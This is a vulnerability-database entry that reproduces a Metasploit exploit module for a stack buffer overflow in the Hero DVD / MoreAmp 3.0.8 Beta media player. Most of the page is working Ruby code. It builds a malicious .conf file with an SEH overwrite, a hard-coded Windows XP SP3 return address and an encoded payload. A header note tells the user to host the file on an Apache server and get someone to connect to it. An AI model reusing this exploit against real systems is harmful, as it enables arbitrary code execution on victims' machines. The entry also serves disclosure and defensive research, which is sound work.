Hero DVD - Buffer Overflow Exploit (meta)

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Hero DVD Remote Buffer Overflow Exploit in 3.0.8 MoreAmp Beta by MadjiX and chap


                                                ##################################################################
#                                           _                    #
#               .-----.--.--.--.----.----.-| |___                #
#               |  _  |  |  |  |     |  -__|  _  |               #
#               |   __|________|__|__|_____|_____|               #
#               |__|        By MadjiX                            #
#                          Sec4ever.com                          #
##################################################################
# Note: Use Backtrack! place httpd.conf in /etc/apache2/ and start apache 
# Have Someone Connect to your Server /sploit
# Credit goes to chap0 for the nice bug!

require &#39;msf/core&#39;
  
class Metasploit3 &#60; Msf::Exploit::Remote
    Rank = NormalRanking
  
    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Seh
  
    def initialize(info = {})
        super(update_info(info,
            &#39;Name&#39; =&#62; &#39;Hero DVD Remote Buffer Overflow Exploit&#39;,
            &#39;Description&#39; =&#62; %q{
                This module exploits a stack overflow in 3.0.8 MoreAmp Beta
            By creating a specially crafted .conf file, an an attacker may be able
            to execute arbitrary code.
            },
            &#39;License&#39; =&#62; MSF_LICENSE,
            &#39;Author&#39; =&#62; 
		[
			&#39;MadjiX &#60;Dz8@HotmaiL[DoT]CoM&#62;&#39;,
			&#39;chap0&#39;	#Discovered by chap0
		],
            &#39;Version&#39; =&#62; &#39;Version 1&#39;,
            &#39;References&#39; =&#62;
                [
                    [ &#39;OSVDB&#39;, &#39;N/A&#39; ],
                    [ &#39;Exploit-DB&#39;, &#39;http://www.exploit-db.com/exploits/14257/&#39; ],
		    [ &#39;Corelan&#39;, &#39;http://www.corelan.be:8800/advisories.php?id=CORELAN-10-056&#39; ]
                ],
            &#39;DefaultOptions&#39; =&#62;
                {
                    &#39;EXITFUNC&#39; =&#62; &#39;process&#39;,
                },
            &#39;Payload&#39; =&#62;
                {
                    &#39;Space&#39; =&#62; 750,
                    &#39;BadChars&#39; =&#62; &#34;\x00\x20\x0a\x0d&#34;,
                    &#39;StackAdjustment&#39; =&#62; -3500,
                },
            &#39;Platform&#39; =&#62; &#39;win&#39;,
            &#39;Targets&#39; =&#62;
                [
                    [ &#39;Windows XP SP3&#39;, { &#39;Ret&#39; =&#62; 0x58324879} ], # 0x58324879 from msg723.acm  
                ],
            &#39;Privileged&#39; =&#62; false,
            &#39;DisclosureDate&#39;  =&#62; &#39;19-07-2010&#39;,
            &#39;DefaultTarget&#39; =&#62; 0))
  
        register_options(
            [
                OptString.new(&#39;FILENAME&#39;, [ false, &#39;The file name.&#39;, &#39;MadjiX.conf&#39;]),
            ], self.class)
    end
  
  
    def exploit
  
        sploit = &#34;Redirect permanent /sploit http://&#34;
        sploit &#60;&#60; rand_text_alphanumeric(128)
        sploit &#60;&#60; [target.ret].pack(&#39;V&#39;)
        sploit &#60;&#60; &#34;B&#34; * 24
        sploit &#60;&#60; payload.encoded
  
        maffile = sploit
        print_status(&#34;Creating &#39;#{datastore[&#39;FILENAME&#39;]}&#39; file ...&#34;)
        file_create(maffile)
  
    end
  
end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1